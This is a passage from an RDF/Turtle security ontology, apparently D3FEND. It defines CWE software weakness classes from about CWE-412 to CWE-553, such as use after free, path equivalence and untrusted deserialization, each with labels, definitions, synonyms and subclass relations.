owl:Class ; rdfs:label "Unrestricted Externally Accessible Lock" ; d3f:cwe-id "CWE-412" ; d3f:definition "The product properly checks for the existence of a lock, but the lock can be externally controlled or influenced by an actor that is outside of the intended sphere of control." ; rdfs:subClassOf d3f:CWE-667 . d3f:CWE-414 a owl:Class ; rdfs:label "Missing Lock Check" ; d3f:cwe-id "CWE-414" ; d3f:definition "A product does not check to see if a lock is present before performing sensitive operations on a resource." ; rdfs:subClassOf d3f:CWE-667 . d3f:CWE-415 a owl:Class, owl:NamedIndividual ; rdfs:label "Double Free" ; d3f:cwe-id "CWE-415" ; d3f:definition "The product calls free() twice on the same memory address." ; d3f:synonym "Double-free" ; d3f:weakness-of d3f:MemoryFreeFunction ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:weakness-of ; owl:someValuesFrom d3f:MemoryFreeFunction ], d3f:CWE-1341, d3f:CWE-666, d3f:CWE-825 . d3f:CWE-416 a owl:Class ; rdfs:label "Use After Free" ; d3f:cwe-id "CWE-416" ; d3f:definition "The product reuses or references memory after it has been freed. At some point afterward, the memory may be allocated again and saved in another pointer, while the original pointer references a location somewhere within the new allocation. Any operations using the original pointer are no longer valid because the memory \"belongs\" to the code that operates on the new pointer." ; d3f:synonym "Dangling pointer", "UAF", "Use-After-Free" ; rdfs:subClassOf d3f:CWE-825 . d3f:CWE-419 a owl:Class ; rdfs:label "Unprotected Primary Channel" ; d3f:cwe-id "CWE-419" ; d3f:definition "The product uses a primary channel for administration or restricted functionality, but it does not properly protect the channel." ; rdfs:subClassOf d3f:CWE-923 . d3f:CWE-421 a owl:Class ; rdfs:label "Race Condition During Access to Alternate Channel" ; d3f:cwe-id "CWE-421" ; d3f:definition "The product opens an alternate channel to communicate with an authorized user, but the channel is accessible to other actors." ; rdfs:subClassOf d3f:CWE-362, d3f:CWE-420 . d3f:CWE-422 a owl:Class ; rdfs:label "Unprotected Windows Messaging Channel ('Shatter')" ; d3f:cwe-id "CWE-422" ; d3f:definition "The product does not properly verify the source of a message in the Windows Messaging System while running at elevated privileges, creating an alternate channel through which an attacker can directly send a message to the product." ; rdfs:subClassOf d3f:CWE-360, d3f:CWE-420 . d3f:CWE-425 a owl:Class ; rdfs:label "Direct Request ('Forced Browsing')" ; d3f:cwe-id "CWE-425" ; d3f:definition "The web application does not adequately enforce appropriate authorization on all restricted URLs, scripts, or files." ; d3f:synonym "forced browsing" ; rdfs:subClassOf d3f:CWE-288, d3f:CWE-424, d3f:CWE-862 . d3f:CWE-426 a owl:Class ; rdfs:label "Untrusted Search Path" ; d3f:cwe-id "CWE-426" ; d3f:definition "The product searches for critical resources using an externally-supplied search path that can point to resources that are not under the product's direct control." ; d3f:synonym "Untrusted Path" ; rdfs:subClassOf d3f:CWE-642, d3f:CWE-673 . d3f:CWE-427 a owl:Class ; rdfs:label "Uncontrolled Search Path Element" ; d3f:cwe-id "CWE-427" ; d3f:definition "The product uses a fixed or controlled search path to find resources, but one or more locations in that path can be under the control of unintended actors." ; d3f:synonym "Binary planting", "DLL preloading", "Dependency confusion", "Insecure library loading" ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-428 a owl:Class ; rdfs:label "Unquoted Search Path or Element" ; d3f:cwe-id "CWE-428" ; d3f:definition "The product uses a search path that contains an unquoted element, in which the element contains whitespace or other separators. This can cause the product to access resources in a parent path." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-43 a owl:Class ; rdfs:label "Path Equivalence: 'filename....' (Multiple Trailing Dot)" ; d3f:cwe-id "CWE-43" ; d3f:definition "The product accepts path input in the form of multiple trailing dot ('filedir....') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files." ; rdfs:subClassOf d3f:CWE-163, d3f:CWE-42 . d3f:CWE-430 a owl:Class ; rdfs:label "Deployment of Wrong Handler" ; d3f:cwe-id "CWE-430" ; d3f:definition "The wrong \"handler\" is assigned to process an object." ; rdfs:subClassOf d3f:CWE-691 . d3f:CWE-431 a owl:Class ; rdfs:label "Missing Handler" ; d3f:cwe-id "CWE-431" ; d3f:definition "A handler is not available or implemented." ; rdfs:subClassOf d3f:CWE-691 . d3f:CWE-432 a owl:Class ; rdfs:label "Dangerous Signal Handler not Disabled During Sensitive Operations" ; d3f:cwe-id "CWE-432" ; d3f:definition "The product uses a signal handler that shares state with other signal handlers, but it does not properly mask or prevent those signal handlers from being invoked while the original signal handler is still running." ; rdfs:subClassOf d3f:CWE-364 . d3f:CWE-433 a owl:Class ; rdfs:label "Unparsed Raw Web Content Delivery" ; d3f:cwe-id "CWE-433" ; d3f:definition "The product stores raw content or supporting code under the web document root with an extension that is not specifically handled by the server." ; rdfs:subClassOf d3f:CWE-219 . d3f:CWE-434 a owl:Class, owl:NamedIndividual ; rdfs:label "Unrestricted Upload of File with Dangerous Type" ; d3f:cwe-id "CWE-434" ; d3f:definition "The product allows the upload or transfer of dangerous file types that are automatically processed within its environment." ; d3f:synonym "Unrestricted File Upload" ; d3f:weakness-of d3f:UserInputFunction ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:weakness-of ; owl:someValuesFrom d3f:UserInputFunction ], d3f:CWE-669 . d3f:CWE-437 a owl:Class ; rdfs:label "Incomplete Model of Endpoint Features" ; d3f:cwe-id "CWE-437" ; d3f:definition "A product acts as an intermediary or monitor between two or more endpoints, but it does not have a complete model of an endpoint's features, behaviors, or state, potentially causing the product to perform incorrect actions based on this incomplete model." ; rdfs:subClassOf d3f:CWE-436 . d3f:CWE-439 a owl:Class ; rdfs:label "Behavioral Change in New Version or Environment" ; d3f:cwe-id "CWE-439" ; d3f:definition "A's behavior or functionality changes with a new version of A, or a new environment, which is not known (or manageable) by B." ; d3f:synonym "Functional change" ; rdfs:subClassOf d3f:CWE-435 . d3f:CWE-440 a owl:Class ; rdfs:label "Expected Behavior Violation" ; d3f:cwe-id "CWE-440" ; d3f:definition "A feature, API, or function does not perform according to its specification." ; rdfs:subClassOf d3f:CWE-684 . d3f:CWE-444 a owl:Class ; rdfs:label "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')" ; d3f:cwe-id "CWE-444" ; d3f:definition "The product acts as an intermediary HTTP agent (such as a proxy or firewall) in the data flow between two entities such as a client and server, but it does not interpret malformed HTTP requests or responses in ways that are consistent with how the messages will be processed by those entities that are at the ultimate destination." ; d3f:synonym "HTTP Request Smuggling", "HTTP Response Smuggling", "HTTP Smuggling" ; rdfs:subClassOf d3f:CWE-436 . d3f:CWE-447 a owl:Class ; rdfs:label "Unimplemented or Unsupported Feature in UI" ; d3f:cwe-id "CWE-447" ; d3f:definition "A UI function for a security feature appears to be supported and gives feedback to the user that suggests that it is supported, but the underlying functionality is not implemented." ; rdfs:subClassOf d3f:CWE-446, d3f:CWE-671 . d3f:CWE-448 a owl:Class ; rdfs:label "Obsolete Feature in UI" ; d3f:cwe-id "CWE-448" ; d3f:definition "A UI function is obsolete and the product does not warn the user." ; rdfs:subClassOf d3f:CWE-446 . d3f:CWE-449 a owl:Class ; rdfs:label "The UI Performs the Wrong Action" ; d3f:cwe-id "CWE-449" ; d3f:definition "The UI performs the wrong action with respect to the user's request." ; rdfs:subClassOf d3f:CWE-446 . d3f:CWE-45 a owl:Class ; rdfs:label "Path Equivalence: 'file...name' (Multiple Internal Dot)" ; d3f:cwe-id "CWE-45" ; d3f:definition "The product accepts path input in the form of multiple internal dot ('file...dir') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files." ; rdfs:subClassOf d3f:CWE-165, d3f:CWE-44 . d3f:CWE-450 a owl:Class ; rdfs:label "Multiple Interpretations of UI Input" ; d3f:cwe-id "CWE-450" ; d3f:definition "The UI has multiple interpretations of user input but does not prompt the user when it selects the less secure interpretation." ; rdfs:subClassOf d3f:CWE-357 . d3f:CWE-453 a owl:Class ; rdfs:label "Insecure Default Variable Initialization" ; d3f:cwe-id "CWE-453" ; d3f:definition "The product, by default, initializes an internal variable with an insecure or less secure value than is possible." ; rdfs:subClassOf d3f:CWE-1188 . d3f:CWE-454 a owl:Class ; rdfs:label "External Initialization of Trusted Variables or Data Stores" ; d3f:cwe-id "CWE-454" ; d3f:definition "The product initializes critical internal variables or data stores using inputs that can be modified by untrusted actors." ; rdfs:subClassOf d3f:CWE-1419, d3f:CWE-665 . d3f:CWE-455 a owl:Class ; rdfs:label "Non-exit on Failed Initialization" ; d3f:cwe-id "CWE-455" ; d3f:definition "The product does not exit or otherwise modify its operation when security-relevant errors occur during initialization, such as when a configuration file has a format error or a hardware security module (HSM) cannot be activated, which can cause the product to execute in a less secure fashion than intended by the administrator." ; rdfs:subClassOf d3f:CWE-636, d3f:CWE-665, d3f:CWE-705 . d3f:CWE-456 a owl:Class ; rdfs:label "Missing Initialization of a Variable" ; d3f:cwe-id "CWE-456" ; d3f:definition "The product does not initialize critical variables, which causes the execution environment to use unexpected values." ; rdfs:subClassOf d3f:CWE-909 . d3f:CWE-457 a owl:Class ; rdfs:label "Use of Uninitialized Variable" ; d3f:cwe-id "CWE-457" ; d3f:definition "The code uses a variable that has not been initialized, leading to unpredictable or unintended results." ; rdfs:subClassOf d3f:CWE-908 . d3f:CWE-46 a owl:Class ; rdfs:label "Path Equivalence: 'filename ' (Trailing Space)" ; d3f:cwe-id "CWE-46" ; d3f:definition "The product accepts path input in the form of trailing space ('filedir ') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files." ; rdfs:subClassOf d3f:CWE-162, d3f:CWE-41 . d3f:CWE-460 a owl:Class ; rdfs:label "Improper Cleanup on Thrown Exception" ; d3f:cwe-id "CWE-460" ; d3f:definition "The product does not clean up its state or incorrectly cleans up its state when an exception is thrown, leading to unexpected state or control flow." ; rdfs:subClassOf d3f:CWE-459, d3f:CWE-755 . d3f:CWE-462 a owl:Class ; rdfs:label "Duplicate Key in Associative List (Alist)" ; d3f:cwe-id "CWE-462" ; d3f:definition "Duplicate keys in associative lists can lead to non-unique keys being mistaken for an error." ; rdfs:subClassOf d3f:CWE-694 . d3f:CWE-463 a owl:Class ; rdfs:label "Deletion of Data Structure Sentinel" ; d3f:cwe-id "CWE-463" ; d3f:definition "The accidental deletion of a data-structure sentinel can cause serious programming logic problems." ; rdfs:subClassOf d3f:CWE-707 . d3f:CWE-464 a owl:Class ; rdfs:label "Addition of Data Structure Sentinel" ; d3f:cwe-id "CWE-464" ; d3f:definition "The accidental addition of a data-structure sentinel can cause serious programming logic problems." ; rdfs:subClassOf d3f:CWE-138 . d3f:CWE-466 a owl:Class ; rdfs:label "Return of Pointer Value Outside of Expected Range" ; d3f:cwe-id "CWE-466" ; d3f:definition "A function can return a pointer to memory that is outside of the buffer that the pointer is expected to reference." ; rdfs:subClassOf d3f:CWE-119 . d3f:CWE-467 a owl:Class ; rdfs:label "Use of sizeof() on a Pointer Type" ; d3f:cwe-id "CWE-467" ; d3f:definition "The code calls sizeof() on a pointer type, which can be an incorrect calculation if the programmer intended to determine the size of the data that is being pointed to." ; rdfs:subClassOf d3f:CWE-131 . d3f:CWE-468 a owl:Class ; rdfs:label "Incorrect Pointer Scaling" ; d3f:cwe-id "CWE-468" ; d3f:definition "In C and C++, one may often accidentally refer to the wrong memory due to the semantics of when math operations are implicitly scaled." ; rdfs:subClassOf d3f:CWE-682 . d3f:CWE-469 a owl:Class ; rdfs:label "Use of Pointer Subtraction to Determine Size" ; d3f:cwe-id "CWE-469" ; d3f:definition "The product subtracts one pointer from another in order to determine size, but this calculation can be incorrect if the pointers do not exist in the same memory chunk." ; rdfs:subClassOf d3f:CWE-682 . d3f:CWE-47 a owl:Class ; rdfs:label "Path Equivalence: ' filename' (Leading Space)" ; d3f:cwe-id "CWE-47" ; d3f:definition "The product accepts path input in the form of leading space (' filedir') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files." ; rdfs:subClassOf d3f:CWE-41 . d3f:CWE-470 a owl:Class ; rdfs:label "Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection')" ; d3f:cwe-id "CWE-470" ; d3f:definition "The product uses external input with reflection to select which classes or code to use, but it does not sufficiently prevent the input from selecting improper classes or code." ; d3f:synonym "Reflection Injection" ; rdfs:subClassOf d3f:CWE-610, d3f:CWE-913 . d3f:CWE-472 a owl:Class ; rdfs:label "External Control of Assumed-Immutable Web Parameter" ; d3f:cwe-id "CWE-472" ; d3f:definition "The web application does not sufficiently verify inputs that are assumed to be immutable but are actually externally controllable, such as hidden form fields." ; d3f:synonym "Assumed-Immutable Parameter Tampering" ; rdfs:subClassOf d3f:CWE-471, d3f:CWE-642 . d3f:CWE-473 a owl:Class ; rdfs:label "PHP External Variable Modification" ; d3f:cwe-id "CWE-473" ; d3f:definition "A PHP application does not properly protect against the modification of variables from external sources, such as query parameters or cookies. This can expose the application to numerous weaknesses that would not exist otherwise." ; rdfs:subClassOf d3f:CWE-471 . d3f:CWE-475 a owl:Class ; rdfs:label "Undefined Behavior for Input to API" ; d3f:cwe-id "CWE-475" ; d3f:definition "The behavior of this function is undefined unless its control parameter is set to a specific value." ; rdfs:subClassOf d3f:CWE-573 . d3f:CWE-477 a owl:Class ; rdfs:label "Use of Obsolete Function" ; d3f:cwe-id "CWE-477" ; d3f:definition "The code uses deprecated or obsolete functions, which suggests that the code has not been actively reviewed or maintained." ; rdfs:subClassOf d3f:CWE-710 . d3f:CWE-478 a owl:Class ; rdfs:label "Missing Default Case in Multiple Condition Expression" ; d3f:cwe-id "CWE-478" ; d3f:definition "The code does not have a default case in an expression with multiple conditions, such as a switch statement." ; rdfs:subClassOf d3f:CWE-1023 . d3f:CWE-479 a owl:Class ; rdfs:label "Signal Handler Use of a Non-reentrant Function" ; d3f:cwe-id "CWE-479" ; d3f:definition "The product defines a signal handler that calls a non-reentrant function." ; rdfs:subClassOf d3f:CWE-663, d3f:CWE-828 . d3f:CWE-48 a owl:Class ; rdfs:label "Path Equivalence: 'file name' (Internal Whitespace)" ; d3f:cwe-id "CWE-48" ; d3f:definition "The product accepts path input in the form of internal space ('file(SPACE)name') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files." ; rdfs:subClassOf d3f:CWE-41 . d3f:CWE-481 a owl:Class ; rdfs:label "Assigning instead of Comparing" ; d3f:cwe-id "CWE-481" ; d3f:definition "The code uses an operator for assignment when the intention was to perform a comparison." ; rdfs:subClassOf d3f:CWE-480 . d3f:CWE-482 a owl:Class ; rdfs:label "Comparing instead of Assigning" ; d3f:cwe-id "CWE-482" ; d3f:definition "The code uses an operator for comparison when the intention was to perform an assignment." ; rdfs:subClassOf d3f:CWE-480 . d3f:CWE-483 a owl:Class ; rdfs:label "Incorrect Block Delimitation" ; d3f:cwe-id "CWE-483" ; d3f:definition "The code does not explicitly delimit a block that is intended to contain 2 or more statements, creating a logic error." ; rdfs:subClassOf d3f:CWE-670 . d3f:CWE-484 a owl:Class ; rdfs:label "Omitted Break Statement in Switch" ; d3f:cwe-id "CWE-484" ; d3f:definition "The product omits a break statement within a switch or similar construct, causing code associated with multiple conditions to execute. This can cause problems when the programmer only intended to execute code associated with one condition." ; rdfs:subClassOf d3f:CWE-670, d3f:CWE-710 . d3f:CWE-486 a owl:Class ; rdfs:label "Comparison of Classes by Name" ; d3f:cwe-id "CWE-486" ; d3f:definition "The product compares classes by name, which can cause it to use the wrong class when multiple classes can have the same name." ; rdfs:subClassOf d3f:CWE-1025 . d3f:CWE-487 a owl:Class ; rdfs:label "Reliance on Package-level Scope" ; d3f:cwe-id "CWE-487" ; d3f:definition "Java packages are not inherently closed; therefore, relying on them for code security is not a good practice." ; rdfs:subClassOf d3f:CWE-664 . d3f:CWE-488 a owl:Class ; rdfs:label "Exposure of Data Element to Wrong Session" ; d3f:cwe-id "CWE-488" ; d3f:definition "The product does not sufficiently enforce boundaries between the states of different sessions, causing data to be provided to, or used by, the wrong session." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-49 a owl:Class ; rdfs:label "Path Equivalence: 'filename/' (Trailing Slash)" ; d3f:cwe-id "CWE-49" ; d3f:definition "The product accepts path input in the form of trailing slash ('filedir/') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files." ; rdfs:subClassOf d3f:CWE-162, d3f:CWE-41 . d3f:CWE-491 a owl:Class ; rdfs:label "Public cloneable() Method Without Final ('Object Hijack')" ; d3f:cwe-id "CWE-491" ; d3f:definition "A class has a cloneable() method that is not declared final, which allows an object to be created without calling the constructor. This can cause the object to be in an unexpected state." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-492 a owl:Class ; rdfs:label "Use of Inner Class Containing Sensitive Data" ; d3f:cwe-id "CWE-492" ; d3f:definition "Inner classes are translated into classes that are accessible at package scope and may expose code that the programmer intended to keep private to attackers." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-494 a owl:Class ; rdfs:label "Download of Code Without Integrity Check" ; d3f:cwe-id "CWE-494" ; d3f:definition "The product downloads source code or an executable from a remote location and executes the code without sufficiently verifying the origin and integrity of the code." ; rdfs:subClassOf d3f:CWE-345, d3f:CWE-669 . d3f:CWE-495 a owl:Class ; rdfs:label "Private Data Structure Returned From A Public Method" ; d3f:cwe-id "CWE-495" ; d3f:definition "The product has a method that is declared public, but returns a reference to a private data structure, which could then be modified in unexpected ways." ; rdfs:subClassOf d3f:CWE-664 . d3f:CWE-496 a owl:Class ; rdfs:label "Public Data Assigned to Private Array-Typed Field" ; d3f:cwe-id "CWE-496" ; d3f:definition "Assigning public data to a private array is equivalent to giving public access to the array." ; rdfs:subClassOf d3f:CWE-664 . d3f:CWE-498 a owl:Class ; rdfs:label "Cloneable Class Containing Sensitive Information" ; d3f:cwe-id "CWE-498" ; d3f:definition "The code contains a class with sensitive data, but the class is cloneable. The data can then be accessed by cloning the class." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-499 a owl:Class ; rdfs:label "Serializable Class Containing Sensitive Data" ; d3f:cwe-id "CWE-499" ; d3f:definition "The code contains a class with sensitive data, but the class does not explicitly deny serialization. The data can be accessed by serializing the class through another class." ; rdfs:subClassOf d3f:CWE-668 . d3f:CWE-5 a owl:Class ; rdfs:label "J2EE Misconfiguration: Data Transmission Without Encryption" ; d3f:cwe-id "CWE-5" ; d3f:definition "Information sent over a network can be compromised while in transit. An attacker may be able to read or modify the contents if the data are sent in plaintext or are weakly encrypted." ; rdfs:subClassOf d3f:CWE-319 . d3f:CWE-50 a owl:Class ; rdfs:label "Path Equivalence: '//multiple/leading/slash'" ; d3f:cwe-id "CWE-50" ; d3f:definition "The product accepts path input in the form of multiple leading slash ('//multiple/leading/slash') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files." ; rdfs:subClassOf d3f:CWE-161, d3f:CWE-41 . d3f:CWE-500 a owl:Class ; rdfs:label "Public Static Field Not Marked Final" ; d3f:cwe-id "CWE-500" ; d3f:definition "An object contains a public static field that is not marked final, which might allow it to be modified in unexpected ways." ; rdfs:subClassOf d3f:CWE-493 . d3f:CWE-501 a owl:Class ; rdfs:label "Trust Boundary Violation" ; d3f:cwe-id "CWE-501" ; d3f:definition "The product mixes trusted and untrusted data in the same data structure or structured message." ; rdfs:subClassOf d3f:CWE-664 . d3f:CWE-502 a owl:Class, owl:NamedIndividual ; rdfs:label "Deserialization of Untrusted Data" ; d3f:cwe-id "CWE-502" ; d3f:definition "The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid." ; d3f:may-be-weakness-of d3f:UserInputFunction ; d3f:synonym "Marshaling, Unmarshaling", "PHP Object Injection", "Pickling, Unpickling" ; d3f:weakness-of d3f:DeserializationFunction ; rdfs:subClassOf [ a owl:Restriction ; owl:onProperty d3f:may-be-weakness-of ; owl:someValuesFrom d3f:UserInputFunction ], [ a owl:Restriction ; owl:onProperty d3f:weakness-of ; owl:someValuesFrom d3f:DeserializationFunction ], d3f:CWE-913 . d3f:CWE-508 a owl:Class ; rdfs:label "Non-Replicating Malicious Code" ; d3f:cwe-id "CWE-508" ; d3f:definition "Non-replicating malicious code only resides on the target system or product that is attacked; it does not attempt to spread to other systems." ; rdfs:subClassOf d3f:CWE-507 . d3f:CWE-509 a owl:Class ; rdfs:label "Replicating Malicious Code (Virus or Worm)" ; d3f:cwe-id "CWE-509" ; d3f:definition "Replicating malicious code, including viruses and worms, will attempt to attack other systems once it has successfully compromised the target system or the product." ; rdfs:subClassOf d3f:CWE-507 . d3f:CWE-51 a owl:Class ; rdfs:label "Path Equivalence: '/multiple//internal/slash'" ; d3f:cwe-id "CWE-51" ; d3f:definition "The product accepts path input in the form of multiple internal slash ('/multiple//internal/slash/') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files." ; rdfs:subClassOf d3f:CWE-41 . d3f:CWE-510 a owl:Class ; rdfs:label "Trapdoor" ; d3f:cwe-id "CWE-510" ; d3f:definition "A trapdoor is a hidden piece of code that responds to a special input, allowing its user access to resources without passing through the normal security enforcement mechanism." ; rdfs:subClassOf d3f:CWE-506 . d3f:CWE-511 a owl:Class ; rdfs:label "Logic/Time Bomb" ; d3f:cwe-id "CWE-511" ; d3f:definition "The product contains code that is designed to disrupt the legitimate operation of the product (or its environment) when a certain time passes, or when a certain logical condition is met." ; rdfs:subClassOf d3f:CWE-506 . d3f:CWE-512 a owl:Class ; rdfs:label "Spyware" ; d3f:cwe-id "CWE-512" ; d3f:definition "The product collects personally identifiable information about a human user or the user's activities, but the product accesses this information using other resources besides itself, and it does not require that user's explicit approval or direct input into the product." ; rdfs:subClassOf d3f:CWE-506 . d3f:CWE-515 a owl:Class ; rdfs:label "Covert Storage Channel" ; d3f:cwe-id "CWE-515" ; d3f:definition "A covert storage channel transfers information through the setting of bits by one program and the reading of those bits by another. What distinguishes this case from that of ordinary operation is that the bits are used to convey encoded information." ; rdfs:subClassOf d3f:CWE-514 . d3f:CWE-52 a owl:Class ; rdfs:label "Path Equivalence: '/multiple/trailing/slash//'" ; d3f:cwe-id "CWE-52" ; d3f:definition "The product accepts path input in the form of multiple trailing slash ('/multiple/trailing/slash//') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files." ; rdfs:subClassOf d3f:CWE-163, d3f:CWE-41 . d3f:CWE-520 a owl:Class ; rdfs:label ".NET Misconfiguration: Use of Impersonation" ; d3f:cwe-id "CWE-520" ; d3f:definition "Allowing a .NET application to run at potentially escalated levels of access to the underlying operating and file systems can be dangerous and result in various forms of attacks." ; rdfs:subClassOf d3f:CWE-266 . d3f:CWE-523 a owl:Class ; rdfs:label "Unprotected Transport of Credentials" ; d3f:cwe-id "CWE-523" ; d3f:definition "Login pages do not use adequate measures to protect the user name and password while they are in transit from the client to the server." ; rdfs:subClassOf d3f:CWE-522 . d3f:CWE-525 a owl:Class ; rdfs:label "Use of Web Browser Cache Containing Sensitive Information" ; d3f:cwe-id "CWE-525" ; d3f:definition "The web application does not use an appropriate caching policy that specifies the extent to which each web page and associated form fields should be cached." ; rdfs:subClassOf d3f:CWE-524 . d3f:CWE-526 a owl:Class ; rdfs:label "Cleartext Storage of Sensitive Information in an Environment Variable" ; d3f:cwe-id "CWE-526" ; d3f:definition "The product uses an environment variable to store unencrypted sensitive information." ; rdfs:subClassOf d3f:CWE-312 . d3f:CWE-527 a owl:Class ; rdfs:label "Exposure of Version-Control Repository to an Unauthorized Control Sphere" ; d3f:cwe-id "CWE-527" ; d3f:definition "The product stores a CVS, git, or other repository in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors." ; rdfs:subClassOf d3f:CWE-552 . d3f:CWE-528 a owl:Class ; rdfs:label "Exposure of Core Dump File to an Unauthorized Control Sphere" ; d3f:cwe-id "CWE-528" ; d3f:definition "The product generates a core dump file in a directory, archive, or other resource that is stored, transferred, or otherwise made accessible to unauthorized actors." ; rdfs:subClassOf d3f:CWE-552 . d3f:CWE-529 a owl:Class ; rdfs:label "Exposure of Access Control List Files to an Unauthorized Control Sphere" ; d3f:cwe-id "CWE-529" ; d3f:definition "The product stores access control list files in a directory or other container that is accessible to actors outside of the intended control sphere." ; rdfs:subClassOf d3f:CWE-552 . d3f:CWE-53 a owl:Class ; rdfs:label "Path Equivalence: '\\multiple\\\\internal\\backslash'" ; d3f:cwe-id "CWE-53" ; d3f:definition "The product accepts path input in the form of multiple internal backslash ('\\multiple\\trailing\\\\slash') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files." ; rdfs:subClassOf d3f:CWE-165, d3f:CWE-41 . d3f:CWE-530 a owl:Class ; rdfs:label "Exposure of Backup File to an Unauthorized Control Sphere" ; d3f:cwe-id "CWE-530" ; d3f:definition "A backup file is stored in a directory or archive that is made accessible to unauthorized actors." ; rdfs:subClassOf d3f:CWE-552 . d3f:CWE-531 a owl:Class ; rdfs:label "Inclusion of Sensitive Information in Test Code" ; d3f:cwe-id "CWE-531" ; d3f:definition "Accessible test applications can pose a variety of security risks. Since developers or administrators rarely consider that someone besides themselves would even know about the existence of these applications, it is common for them to contain sensitive information or functions." ; rdfs:subClassOf d3f:CWE-540 . d3f:CWE-532 a owl:Class ; rdfs:label "Insertion of Sensitive Information into Log File" ; d3f:cwe-id "CWE-532" ; d3f:definition "The product writes sensitive information to a log file." ; rdfs:subClassOf d3f:CWE-538 . d3f:CWE-535 a owl:Class ; rdfs:label "Exposure of Information Through Shell Error Message" ; d3f:cwe-id "CWE-535" ; d3f:definition "A command shell error message indicates that there exists an unhandled exception in the web application code. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the system." ; rdfs:subClassOf d3f:CWE-211 . d3f:CWE-536 a owl:Class ; rdfs:label "Servlet Runtime Error Message Containing Sensitive Information" ; d3f:cwe-id "CWE-536" ; d3f:definition "A servlet error message indicates that there exists an unhandled exception in your web application code and may provide useful information to an attacker." ; rdfs:subClassOf d3f:CWE-211 . d3f:CWE-537 a owl:Class ; rdfs:label "Java Runtime Error Message Containing Sensitive Information" ; d3f:cwe-id "CWE-537" ; d3f:definition "In many cases, an attacker can leverage the conditions that cause unhandled exception errors in order to gain unauthorized access to the system." ; rdfs:subClassOf d3f:CWE-211 . d3f:CWE-539 a owl:Class ; rdfs:label "Use of Persistent Cookies Containing Sensitive Information" ; d3f:cwe-id "CWE-539" ; d3f:definition "The web application uses persistent cookies, but the cookies contain sensitive information." ; rdfs:subClassOf d3f:CWE-552 . d3f:CWE-54 a owl:Class ; rdfs:label "Path Equivalence: 'filedir\\' (Trailing Backslash)" ; d3f:cwe-id "CWE-54" ; d3f:definition "The product accepts path input in the form of trailing backslash ('filedir\\') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files." ; rdfs:subClassOf d3f:CWE-162, d3f:CWE-41 . d3f:CWE-541 a owl:Class ; rdfs:label "Inclusion of Sensitive Information in an Include File" ; d3f:cwe-id "CWE-541" ; d3f:definition "If an include file source is accessible, the file can contain usernames and passwords, as well as sensitive information pertaining to the application and system." ; rdfs:subClassOf d3f:CWE-540 . d3f:CWE-543 a owl:Class ; rdfs:label "Use of Singleton Pattern Without Synchronization in a Multithreaded Context" ; d3f:cwe-id "CWE-543" ; d3f:definition "The product uses the singleton pattern when creating a resource within a multithreaded environment." ; rdfs:subClassOf d3f:CWE-820 . d3f:CWE-544 a owl:Class ; rdfs:label "Missing Standardized Error Handling Mechanism" ; d3f:cwe-id "CWE-544" ; d3f:definition "The product does not use a standardized method for handling errors throughout the code, which might introduce inconsistent error handling and resultant weaknesses." ; rdfs:subClassOf d3f:CWE-755 . d3f:CWE-546 a owl:Class ; rdfs:label "Suspicious Comment" ; d3f:cwe-id "CWE-546" ; d3f:definition "The code contains comments that suggest the presence of bugs, incomplete functionality, or weaknesses." ; rdfs:subClassOf d3f:CWE-1078 . d3f:CWE-547 a owl:Class ; rdfs:label "Use of Hard-coded, Security-relevant Constants" ; d3f:cwe-id "CWE-547" ; d3f:definition "The product uses hard-coded constants instead of symbolic names for security-critical values, which increases the likelihood of mistakes during code maintenance or security policy change." ; rdfs:subClassOf d3f:CWE-1078 . d3f:CWE-548 a owl:Class ; rdfs:label "Exposure of Information Through Directory Listing" ; d3f:cwe-id "CWE-548" ; d3f:definition "The product inappropriately exposes a directory listing with an index of all the resources located inside of the directory." ; rdfs:subClassOf d3f:CWE-497 . d3f:CWE-549 a owl:Class ; rdfs:label "Missing Password Field Masking" ; d3f:cwe-id "CWE-549" ; d3f:definition "The product does not mask passwords during entry, increasing the potential for attackers to observe and capture passwords." ; rdfs:subClassOf d3f:CWE-522 . d3f:CWE-55 a owl:Class ; rdfs:label "Path Equivalence: '/./' (Single Dot Directory)" ; d3f:cwe-id "CWE-55" ; d3f:definition "The product accepts path input in the form of single dot directory exploit ('/./') without appropriate validation, which can lead to ambiguous path resolution and allow an attacker to traverse the file system to unintended locations or access arbitrary files." ; rdfs:subClassOf d3f:CWE-41 . d3f:CWE-550 a owl:Class ; rdfs:label "Server-generated Error Message Containing Sensitive Information" ; d3f:cwe-id "CWE-550" ; d3f:definition "Certain conditions, such as network failure, will cause a server error message to be displayed." ; rdfs:subClassOf d3f:CWE-209 . d3f:CWE-551 a owl:Class ; rdfs:label "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization" ; d3f:cwe-id "CWE-551" ; d3f:definition "If a web server does not fully parse requested URLs before it examines them for authorization, it may be possible for an attacker to bypass authorization protection." ; rdfs:subClassOf d3f:CWE-696, d3f:CWE-863 . d3f:CWE-553 a owl:Class 